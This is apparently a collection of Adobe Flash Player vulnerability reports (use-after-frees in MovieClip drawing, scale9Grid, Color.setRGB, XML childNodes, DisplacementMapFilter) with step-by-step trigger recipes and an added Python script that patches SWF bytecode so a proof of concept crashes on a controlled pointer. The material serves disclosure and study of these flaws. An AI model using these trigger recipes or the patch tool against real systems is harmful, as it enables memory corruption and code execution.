A nasty-looking crash manifests in several different ways under fuzzing, apparently related to drawing and bitmap handling. On 64-bit Linux the crash looks like this: rax 0x83071500ff0300 (36881008741516032). If we trace through the uses of %rax, we get to some bad writes pretty easily. A trigger is attached, signal_sigsegv_7ffff5b5aee2_252_0688bbd450e7c095265d00be2fca50ab.swf, and the base file from which this fuzz case was generated is also attached, 0688bbd450e7c095265d00be2fca50ab.swf.
There is a use-after-free vulnerability in Adobe Flash Player in the handling of the initObject parameter used when attaching a movie clip. If the initObject contains an object whose method call deletes the movie clip that is being attached, the attach code continues to use the freed clip. A proof-of-concept is provided in the form of a sample fla and swf.
There are use-after-frees related to storing a single pointer (the this pointer) across calls in several MovieClip drawing methods, including beginFill, beginBitmapFill, beginGradientFill, lineGradientStyle, lineTo, moveTo, curveTo and lineStyle. A proof-of-concept involving beginBitmapFill is below; a sample fla and swf are attached.
There is a use-after-free issue if the scale9Grid setter is called on an object with a member that, when evaluated, frees the display item. The issue occurs for both MovieClips and Buttons, so it needs to be fixed in both classes. A proof-of-concept is provided in the form of a .fla and .swf file.
There is a use after free in Flash caused by improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. This is almost a repost of Issue 457680, due to a patch failure. The AS2 mapBitmap_v2_as2.fla can be compiled with Flash CS5; some bytes must then be changed manually to trigger the issue. Put mapBitmap_v2_as2.swf in a browsable directory and open the swf with Chrome. It should crash while dereferencing 0x41424344 (hopefully; not yet tested because a build was not available). After compiling mapBitmap_v2_as2.swf, the bytes at offset 0x92B (inside the MyBitmapData constructor) must be changed from 52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (eight ActionPop opcodes).
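The byte patch above is easy to get wrong by hand, because Flash CS5 writes zlib-compressed (CWS) files by default and a file offset like 0x92B only makes sense in the uncompressed layout. The following script is an added example, not code from the report or from Adobe: it inflates the SWF, checks that the expected bytes really are at the offset, overwrites them with ActionPop opcodes, and writes the result back uncompressed (FWS), which Flash Player loads just as well. The function names (patch_swf, inflate_swf, build_sample_swf) are mine; the assumption that 0x92B is measured from the start of the uncompressed file is mine too. The sample SWF built inline is a constructed, zero-filled stand-in that carries the 8-byte pattern at the right offset, not a playable Flash movie.

```python
"""Apply the 8-byte bytecode patch described above to mapBitmap_v2_as2.swf.

Added example (not from the original report). Assumptions: the offset 0x92B
is measured from the start of the *uncompressed* file, and the SWF is either
uncompressed (FWS) or zlib-compressed (CWS); LZMA (ZWS) is not handled.
"""
import struct
import sys
import zlib

PATCH_OFFSET = 0x92B

# The bytes the report says sit at 0x92B inside the MyBitmapData constructor,
# with their SWF DoAction (AS2 bytecode) meaning:
#   52              ActionCallMethod
#   17              ActionPop
#   96 02 00 04 03  ActionPush, length 2: type 4 = register, register 3
#   26              ActionTrace
ORIGINAL = bytes.fromhex("52 17 96 02 00 04 03 26")

# Replacement from the report: eight ActionPop (0x17) opcodes. Same length,
# so DoAction tag lengths and every other offset in the file are unaffected.
REPLACEMENT = bytes([0x17]) * len(ORIGINAL)


def inflate_swf(data: bytes) -> bytes:
    """Return the SWF as an uncompressed FWS blob with a consistent header."""
    if len(data) < 8:
        raise ValueError("too short to be a SWF")
    sig, version = data[:3], data[3]
    # FileLength is the uncompressed length of the whole file, header included.
    file_length = struct.unpack_from("<I", data, 4)[0]
    if sig == b"FWS":
        body = data[8:]
    elif sig == b"CWS":
        body = zlib.decompress(data[8:])
    else:
        raise ValueError(f"unsupported SWF signature {sig!r}")
    if len(body) + 8 != file_length:
        raise ValueError("FileLength header does not match decoded body length")
    return b"FWS" + bytes([version]) + struct.pack("<I", file_length) + body


def patch_swf(data: bytes, offset: int = PATCH_OFFSET,
              original: bytes = ORIGINAL, replacement: bytes = REPLACEMENT) -> bytes:
    """Inflate, verify the expected bytes at `offset`, overwrite them, return FWS bytes."""
    if len(original) != len(replacement):
        raise ValueError("patch must not change the tag length")
    swf = bytearray(inflate_swf(data))
    found = bytes(swf[offset:offset + len(original)])
    if found != original:
        raise ValueError(f"unexpected bytes at {offset:#x}: {found.hex()} "
                         f"(expected {original.hex()}); wrong file or offset?")
    swf[offset:offset + len(replacement)] = replacement
    return bytes(swf)


def build_sample_swf(compress: bool) -> bytes:
    """Constructed stand-in for mapBitmap_v2_as2.swf: a zero-filled 4 KiB file
    with ORIGINAL placed at PATCH_OFFSET. Not a playable Flash movie."""
    total = 0x1000
    body = bytearray(total - 8)
    body[PATCH_OFFSET - 8:PATCH_OFFSET - 8 + len(ORIGINAL)] = ORIGINAL
    header = (b"CWS" if compress else b"FWS") + bytes([10]) + struct.pack("<I", total)
    return header + (zlib.compress(bytes(body)) if compress else bytes(body))


if __name__ == "__main__":
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:
        data = build_sample_swf(compress=True)  # demo run on the constructed sample
    patched = patch_swf(data)
    if len(sys.argv) == 3:
        with open(sys.argv[2], "wb") as f:
            f.write(patched)
    print(f"patched {len(ORIGINAL)} bytes at {PATCH_OFFSET:#x}: "
          f"{patched[PATCH_OFFSET:PATCH_OFFSET + len(ORIGINAL)].hex()}")
```

Usage: python patch_mapbitmap.py mapBitmap_v2_as2.swf mapBitmap_v2_as2_patched.swf. The byte check is the important part: if the compiler emitted slightly different code, the script refuses rather than corrupting an unrelated tag, and the error message shows what was actually found so the offset can be re-derived. The same script serves the original mapBitmap_as2.swf variant once its offset and expected bytes are known, by passing them as the offset and original arguments.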
When calling Color.setRGB in AS2 it is possible to free the target_mc object that was passed to the Color constructor while a reference to it remains on the stack.
If a watch (Object.watch) is set on the childNodes property of an XML object, and the XML object is then manipulated in a way that causes its child nodes to be enumerated, the watch callback fires. If that callback deletes all the child nodes, the buffer holding the nodes is freed even though the original function still accesses it when it unwinds. This can leave a childNodes array in ActionScript containing pointers that an attacker can control.
An access violation was observed in the Adobe Flash Player plugin, which could allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused by a memory corruption issue when handling specially crafted Flash content.
The out-of-bounds read appears to be caused by a missing bounds check in the code; it reproduces reliably with the latest Adobe Flash Player Projector for Windows and with Google Chrome for Windows.
There is a use after free in Flash caused by improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. The AS2 mapBitmap_as2.fla can be compiled with Flash CS5; some bytes must then be changed manually in the compiled swf to trigger the issue (step 3 below cannot be expressed in ActionScript source). Put mapBitmap_as2.swf in a browsable directory and open the swf with Chrome. It should crash while dereferencing 0x41424344. The steps to trigger the issue:
1) Create a BitmapData and store it somewhere, for example as a static member of a custom class.
2) Create a second BitmapData and use it to create a DisplacementMapFilter. This BitmapData is not otherwise used; it is only needed to construct the filter.
3) Override the BitmapData constructor with a custom class. That class should leave the first BitmapData on top of the AS2 stack when the constructor returns.
4) Create an object o and replace its valueOf method with a function that accesses the DisplacementMapFilter.mapBitmap property.
5) Using the first BitmapData, call getPixel32(o). Converting o to a number invokes o.valueOf, so mapBitmap is accessed while getPixel32 is still operating on the BitmapData, which is how the stale reference is reached.